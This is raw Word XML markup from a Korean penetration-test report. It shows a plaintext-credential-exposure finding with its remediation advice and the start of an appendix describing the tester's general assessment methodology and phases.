AAgAAAAhADj9If/WAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMkO4AewAgAAlAUAAA4AAAAA&#10;AAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAGo1dsTcAAAACAEAAA8A&#10;AAAAAAAAAAAAAAAACgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAATBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0006118B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251877376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79B1810F" wp14:editId="35160F8E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>956310</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>667385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2012950" cy="285750"/>
                <wp:effectExtent l="0" t="0" r="25400" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="42" name="직사각형 42"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2012950"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1572" id="직사각형 42" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:75.3pt;margin-top:52.55pt;width:158.5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kHrwIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r06CZG2DOkXQIsOA&#10;oi3WDj0rshQbkEVNUuJkt+4fBvQPdtlh3zV0/zBKst2gK3YYloNDiuSj+ETy5HRbK7IR1lWgczo8&#10;GFAiNIei0qucfrxdvDmixHmmC6ZAi5zuhKOns9evThozFSMoQRXCEgTRbtqYnJbem2mWOV6KmrkD&#10;MEKjUYKtmUfVrrLCsgbRa5WNBoO3WQO2MBa4cA5Pz5ORziK+lIL7Kymd8ETlFO/m49fG7zJ8s9kJ&#10;m64sM2XF22uwf7hFzSqNSXuoc+YZWdvqD6i64hYcSH/Aoc5AyoqLWANWMxw8q+amZEbEWpAcZ3qa&#10;3P+D5Zeba0uqIqfjESWa1fhGj9/uH798//nj/tfDV4LHyFFj3BRdb8y1bTWHYih4K20d/rEUso28&#10;7npexdYTjodY2uh4gvRztI2OJocoI0z2FG2s8+8E1CQIObX4bpFOtrlwPrl2LiGZhkWlFJ6zqdKk&#10;wcY7HiBm0B2oqgjWqNjV8kxZsmH4/IvFAH9t4j03vIbSeJtQY6oqSn6nRErwQUhkKNSRMoTeFD0s&#10;41xoP0ymkhUiZZvsJ+siYs1KI2BAlnjLHrsF6DwTSIedGGj9Q6iIrd0Ht6X/LbiPiJlB+z64rjTY&#10;lypTWFWbOfl3JCVqAktLKHbYPxbSYDnDFxW+4AVz/ppZnCR8dNwO/go/UgG+FLQSJSXYzy+dB39s&#10;cLRS0uBk5tR9WjMrKFHvNbb+8XA8DqMclfHkcISK3bcs9y16XZ8Bvv4Q95DhUQz+XnWitFDf4RKZ&#10;h6xoYppj7pxybzvlzKeNgWuIi/k8uuH4GuYv9I3hATywGjr0dnvHrGnb2OMAXEI3xWz6rJuTb4jU&#10;MF97kFVs9SdeW75x9GPjtGsq7JZ9PXo9LdPZbwAAAP//AwBQSwMEFAAGAAgAAAAhAAGk/KbeAAAA&#10;CwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwzAMhe9I/IfISNxY0oq1U2k6ARJCIA4w4J41Xlut&#10;caoma8u/x3CBm5/f0/Pncru4Xkw4hs6ThmSlQCDV3nbUaPh4f7jagAjRkDW9J9TwhQG21flZaQrr&#10;Z3rDaRcbwSUUCqOhjXEopAx1i86ElR+Q2Dv40ZnIcmykHc3M5a6XqVKZdKYjvtCaAe9brI+7k9Pw&#10;6o8H2X+m6XN+95jmT24zN9OL1pcXy+0NiIhL/AvDDz6jQ8VMe38iG0TPeq0yjvKg1gkITlxnOW/2&#10;v1YCsirl/x+qbwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDp+4kHrwIAAJQFAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQABpPym3gAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAAAkFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E00A39">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A626ED" wp14:editId="2A5F8178">
            <wp:extent cx="4572000" cy="1566424"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1524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56" t="33112" r="1536" b="37373"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="15664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BF5BA6" w14:textId="127A3BC2" w:rsidR="00D10C6D" w:rsidRDefault="00E00A39" w:rsidP="00E00A39">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc209094663"/>
      <w:r>
        <w:t xml:space="preserve">[그림] </w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve"> SEQ [</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText>그림</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve">] \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용</w:t>
      </w:r>
      <w:r w:rsidR="002B2F17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 아이디 및 패스워드 평문 노출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p w14:paraId="50BD34DC" w14:textId="62162071" w:rsidR="00D10C6D" w:rsidRPr="00837FA4" w:rsidRDefault="00D10C6D" w:rsidP="00343769">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F9A29A" w14:textId="77777777" w:rsidR="00343769" w:rsidRPr="00CB22A6" w:rsidRDefault="00343769" w:rsidP="00343769">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFE4DC" w14:textId="784D51CE" w:rsidR="00343769" w:rsidRDefault="00113958" w:rsidP="00343769">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹상에서 불필요한 비밀번호,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>주민등록번호,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계좌정보와 같은 중요 정보의 전송을 제한하</w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 최소</w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>화하여야 합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>불가피하게 중요정보를 전송해야</w:t>
      </w:r>
      <w:r w:rsidR="008A7D3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 할 때에는</w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 반드시 </w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 등과 같은 암호화 통신을 사용하여 도청으로부터의 위험을 제거해야 합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>추가</w:t>
      </w:r>
      <w:r w:rsidR="00936C28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidR="00285D95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 클라이언트 측에서 노출되는 부분에는 중요정보를 기록하지 말아야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165EEA1" w14:textId="77777777" w:rsidR="00DA1F20" w:rsidRPr="00343769" w:rsidRDefault="00DA1F20" w:rsidP="00DA1F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370B9FE0" w14:textId="65CFEDA1" w:rsidR="00FD6D72" w:rsidRPr="00582120" w:rsidRDefault="00DA1F20" w:rsidP="00582120">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3F6A8D2" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="00AD774D">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="_Toc206601967"/>
      <w:bookmarkStart w:id="468" w:name="_Toc209094572"/>
      <w:bookmarkStart w:id="469" w:name="_Toc479668188"/>
      <w:bookmarkStart w:id="470" w:name="_Toc479668231"/>
      <w:bookmarkStart w:id="471" w:name="_Toc479668430"/>
      <w:bookmarkStart w:id="472" w:name="_Toc479669584"/>
      <w:bookmarkEnd w:id="244"/>
      <w:bookmarkEnd w:id="245"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ⅰ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004E422B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>별첨</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w14:paraId="68B769F0" w14:textId="31B047C6" w:rsidR="00F57788" w:rsidRPr="004E422B" w:rsidRDefault="00802A7F" w:rsidP="00AA29D6">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="560"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="_Toc206601968"/>
      <w:bookmarkStart w:id="474" w:name="_Toc209094573"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="00F57788" w:rsidRPr="004E422B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 방법론</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
      <w:bookmarkEnd w:id="470"/>
      <w:bookmarkEnd w:id="471"/>
      <w:bookmarkEnd w:id="472"/>
      <w:bookmarkEnd w:id="473"/>
      <w:bookmarkEnd w:id="474"/>
    </w:p>
    <w:p w14:paraId="5F67FA5F" w14:textId="77777777" w:rsidR="00F57788" w:rsidRPr="004E422B" w:rsidRDefault="00802A7F" w:rsidP="00F13AA6">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="_Toc479668189"/>
      <w:bookmarkStart w:id="476" w:name="_Toc479668232"/>
      <w:bookmarkStart w:id="477" w:name="_Toc479668431"/>
      <w:bookmarkStart w:id="478" w:name="_Toc479669585"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="00F57788" w:rsidRPr="004E422B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 개요</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
      <w:bookmarkEnd w:id="476"/>
      <w:bookmarkEnd w:id="477"/>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p w14:paraId="32FCF4B7" w14:textId="7A441FB6" w:rsidR="00F57788" w:rsidRDefault="00F57788" w:rsidP="00F13AA6">
      <w:pPr>
        <w:pStyle w:val="Level2Alt2"/>
        <w:wordWrap/>
        <w:ind w:leftChars="350" w:hangingChars="4" w:hanging="8"/>
      </w:pPr>
      <w:r w:rsidRPr="003E504B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비</w:t>
      </w:r>
      <w:r w:rsidRPr="003E504B">
        <w:t xml:space="preserve"> 인가자로 인한 해킹의 위협을 테스트하기 위하여 고객사의 내</w:t>
      </w:r>
      <w:r>
        <w:t>ㆍ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>외</w:t>
      </w:r>
      <w:r w:rsidRPr="003E504B">
        <w:t>부 서비스용 시스템을 대상으로 아래와 같은 환경에서 테스트를 실시합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394A5C3" w14:textId="2281917D" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="00F57788" w:rsidP="002A6864">
      <w:pPr>
        <w:pStyle w:val="Level3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F653B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약성분석</w:t>
      </w:r>
      <w:r w:rsidRPr="00F653B9">
        <w:t xml:space="preserve"> 전</w:t>
      </w:r>
      <w:r w:rsidR="002A6864" w:rsidRPr="00097BC9">
        <w:t>용영역인 SWAT Room에서 안전하게 진단을 수행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A7DC7E" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="993"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고객사 로컬 수행의 경우 고객사가 지정한 장소에서 수행)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC29F84" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대상시스템의</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> IP Address 정보만을 획득한 상태에서 취약점진단을 수행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E91AD" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고객사의</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 내ㆍ</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>외부</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 서비스용 시스템을 대상으로 수행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7641B" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대상</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 시스템의 특권을 획득하여 특권소유의 파일 또는 디렉터리 표시를 남김</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:br/>
        <w:t>(UNIX 계열 : /infosec, Windows 계열 : C:\infosec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D281382" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:ind w:left="993" w:hanging="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대상</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 시스템 주변의 시스템을 이용한 공격이 가능할 경우 주변 시스템을 경유한 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358148CE" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD2D3F0" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="_Toc479668190"/>
      <w:bookmarkStart w:id="480" w:name="_Toc479668233"/>
      <w:bookmarkStart w:id="481" w:name="_Toc479668432"/>
      <w:bookmarkStart w:id="482" w:name="_Toc479669586"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>취약점진단 수행 방법</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
      <w:bookmarkEnd w:id="480"/>
      <w:bookmarkEnd w:id="481"/>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w14:paraId="22197482" w14:textId="0D38282B" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="350" w:left="700"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 수행 절차는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SK</w:t>
      </w:r>
      <w:r w:rsidR="00867F99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쉴더스</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t>에서 자체 연구 개발한 방법론인 TMoIPT (The Methodology of Infosec Penetration Test)를 통해서 수행됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45975C4B" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="350" w:left="700"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아래</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 그림과 같이 기본적인 프로젝트 준비를 위한 “1) 사전 업무 협의 단계”를 거쳐 대상과 시나리오 및 기간을 정한 후 정보 수집을 위한 “2) 정보 수집 단계”를 진행합니다. 이 단계에서 수집된 정보를 바탕으로 하여 “3) 취약점 분석 단계”를 진행하며 상세 취약점 분석 단계 후에 실제 공격을 위한 “4) Exploit 단계”를 수행합니다. 마지막으로 발견된 취약점과 위협에 대한 보고서를 작성하고 검토하는 “5) 보고서 작성 및 프로젝트 종료 단계”를 수행합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC8482" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:leftChars="280" w:left="560"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001A3267" wp14:editId="1298B217">
            <wp:extent cx="5155911" cy="2071456"/>
            <wp:effectExtent l="0" t="0" r="6985"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55911" cy="2071456"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D345236" w14:textId="7B52CF59" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:ind w:leftChars="354" w:left="708" w:rightChars="70" w:right="140" w:firstLine="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="_Toc209094664"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림] </w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림] \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>91</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. 모의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>해킹 수행 방법</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p w14:paraId="2B429312" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3410EEE2" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A929AC" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>취약점진단 수행 방법 단계별 상세</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB06F98" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:leftChars="354" w:left="708"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:bookmarkStart w:id="484" w:name="_Toc479668191"/>
      <w:bookmarkStart w:id="485" w:name="_Toc479668234"/>
      <w:bookmarkStart w:id="486" w:name="_Toc479668433"/>
      <w:bookmarkStart w:id="487" w:name="_Toc479669587"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
